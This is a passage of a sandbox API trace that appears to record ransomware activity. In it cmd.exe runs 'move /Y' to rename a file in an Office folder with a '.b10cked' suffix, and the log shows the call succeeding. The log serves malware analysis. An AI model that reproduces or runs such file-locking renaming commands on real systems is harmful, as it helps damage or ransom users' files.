lpCPInfo=0x4a9e4260) returned 1 [0151.995] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0151.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.995] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0151.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0151.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.996] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0151.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0151.996] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0151.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0151.996] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0151.996] GetEnvironmentStringsW () returned 0x220210* [0151.996] FreeEnvironmentStringsW (penv=0x220210) returned 1 [0151.997] GetEnvironmentStringsW () returned 0x220210* [0151.997] FreeEnvironmentStringsW (penv=0x220210) returned 1 [0151.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea44 | out: phkResult=0x14ea44*=0x40) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0xa0, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x1, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x1, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x0, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x40, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x40, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x40, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegCloseKey (hKey=0x40) returned 0x0 [0151.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ea44 | out: phkResult=0x14ea44*=0x40) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x40, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x1, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x1, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x0, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.997] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x9, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.998] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x4, lpData=0x14ea50*=0x9, lpcbData=0x14ea48*=0x4) returned 0x0 [0151.998] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ea4c, lpData=0x14ea50, lpcbData=0x14ea48*=0x1000 | out: lpType=0x14ea4c*=0x0, lpData=0x14ea50*=0x9, lpcbData=0x14ea48*=0x1000) returned 0x2 [0151.998] RegCloseKey (hKey=0x40) returned 0x0 [0151.998] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637a [0151.998] srand (_Seed=0x5b88637a) [0151.998] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"" [0151.998] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked\"" [0151.998] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0151.998] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x221970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0151.998] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0151.999] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0151.999] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0151.999] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0151.999] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0151.999] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0151.999] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0151.999] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0151.999] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0151.999] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0151.999] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0151.999] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0151.999] GetEnvironmentStringsW () returned 0x222360* [0151.999] FreeEnvironmentStringsW (penv=0x222360) returned 1 [0151.999] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.999] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0151.999] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0151.999] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0151.999] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0151.999] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0151.999] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0151.999] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0151.999] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0151.999] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0152.000] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f810 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f810, lpFilePart=0x14f80c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f80c*="Desktop") returned 0x18 [0152.000] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.000] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f58c | out: lpFindFileData=0x14f58c) returned 0x2209f0 [0152.000] FindClose (in: hFindFile=0x2209f0 | out: hFindFile=0x2209f0) returned 1 [0152.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f58c | out: lpFindFileData=0x14f58c) returned 0x2209f0 [0152.000] FindClose (in: hFindFile=0x2209f0 | out: hFindFile=0x2209f0) returned 1 [0152.000] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f58c | out: lpFindFileData=0x14f58c) returned 0x2209f0 [0152.001] FindClose (in: hFindFile=0x2209f0 | out: hFindFile=0x2209f0) returned 1 [0152.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.001] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0152.001] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0152.001] GetEnvironmentStringsW () returned 0x220210* [0152.001] FreeEnvironmentStringsW (penv=0x220210) returned 1 [0152.001] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.002] GetConsoleOutputCP () returned 0x1b5 [0152.002] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.002] GetUserDefaultLCID () returned 0x409 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f950, cchData=128 | out: lpLCData="0") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f950, cchData=128 | out: lpLCData="0") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f950, cchData=128 | out: lpLCData="1") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0152.002] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0152.003] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0152.003] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0152.004] GetConsoleTitleW (in: lpConsoleTitle=0x210930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.004] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.004] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0152.004] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0152.004] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0152.005] _wcsicmp (_String1="move", _String2=")") returned 68 [0152.005] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0152.005] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0152.005] _wcsicmp (_String1="IF", _String2="move") returned -4 [0152.005] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0152.005] _wcsicmp (_String1="REM", _String2="move") returned 5 [0152.005] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0152.010] GetConsoleTitleW (in: lpConsoleTitle=0x14f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.156] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0152.156] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0152.156] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0152.156] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0152.156] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0152.156] _wcsicmp (_String1="move", _String2="CD") returned 10 [0152.156] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0152.156] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0152.156] _wcsicmp (_String1="move", _String2="REN") returned -5 [0152.156] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0152.156] _wcsicmp (_String1="move", _String2="SET") returned -6 [0152.156] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0152.156] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0152.156] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0152.156] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0152.156] _wcsicmp (_String1="move", _String2="MD") returned 11 [0152.156] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0152.156] _wcsicmp (_String1="move", _String2="RD") returned -5 [0152.156] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0152.156] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0152.156] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0152.156] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0152.157] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0152.157] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0152.157] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0152.157] _wcsicmp (_String1="move", _String2="VER") returned -9 [0152.157] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0152.157] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0152.157] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0152.157] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0152.157] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0152.157] _wcsicmp (_String1="move", _String2="START") returned -6 [0152.157] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0152.157] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0152.157] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0152.158] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0152.159] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0152.159] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f404, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f3fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f3fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.159] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0152.160] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0152.160] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0152.160] _wcsicmp (_String1="ENVELO~1.TRX", _String2=".") returned 55 [0152.160] _wcsicmp (_String1="ENVELO~1.TRX", _String2="..") returned 55 [0152.160] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelo~1.trx")) returned 0x2020 [0152.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x221f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.161] SetErrorMode (uMode=0x0) returned 0x0 [0152.161] SetErrorMode (uMode=0x1) returned 0x0 [0152.161] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", nBufferLength=0x104, lpBuffer=0x14ed8c, lpFilePart=0x14ed74 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", lpFilePart=0x14ed74*="ENVELO~1.TRX") returned 0x3c [0152.161] SetErrorMode (uMode=0x0) returned 0x1 [0152.161] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2010 [0152.161] _wcsicmp (_String1="ENVELO~1.TRX", _String2=".") returned 55 [0152.161] _wcsicmp (_String1="ENVELO~1.TRX", _String2="..") returned 55 [0152.161] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelo~1.trx")) returned 0x2020 [0152.161] SetErrorMode (uMode=0x0) returned 0x0 [0152.161] SetErrorMode (uMode=0x1) returned 0x0 [0152.161] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", nBufferLength=0x104, lpBuffer=0x14f208, lpFilePart=0x14efa0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", lpFilePart=0x14efa0*="ENVELO~1.TRX") returned 0x3c [0152.161] SetErrorMode (uMode=0x0) returned 0x1 [0152.162] SetErrorMode (uMode=0x0) returned 0x0 [0152.162] SetErrorMode (uMode=0x1) returned 0x0 [0152.162] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14f410, lpFilePart=0x14efa0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked", lpFilePart=0x14efa0*="ENVELOPR.DLL.trx_dll.b10cked") returned 0x4c [0152.162] SetErrorMode (uMode=0x0) returned 0x1 [0152.162] SetLastError (dwErrCode=0x0) [0152.162] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelopr.dll.trx_dll.b10cked")) returned 0xffffffff [0152.162] GetLastError () returned 0x2 [0152.162] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x14e91c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e91c) returned 0x222130 [0152.162] FindNextFileW (in: hFindFile=0x222130, lpFindFileData=0x14e91c | out: lpFindFileData=0x14e91c) returned 0 [0152.163] GetLastError () returned 0x12 [0152.163] FindClose (in: hFindFile=0x222130 | out: hFindFile=0x222130) returned 1 [0152.165] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELO~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x221cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x221cc0) returned 0x222130 [0152.165] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0152.165] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x14ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0152.165] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelopr.dll.trx_dll")) returned 0x2020 [0152.165] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelopr.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ENVELOPR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\envelopr.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0152.166] FindClose (in: hFindFile=0x222130 | out: hFindFile=0x222130) returned 1 [0152.166] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14eb68 | out: _Buffer=" 1") returned 9 [0152.166] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.166] GetFileType (hFile=0x7) returned 0x2 [0152.166] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.166] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14eaf4 | out: lpMode=0x14eaf4) returned 1 [0152.166] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14eb28 | out: lpConsoleScreenBufferInfo=0x14eb28) returned 1 [0152.166] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0152.167] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14eb68 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0152.167] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14eb4c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14eb4c*=0x1a) returned 1 [0152.167] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.167] SetConsoleMode 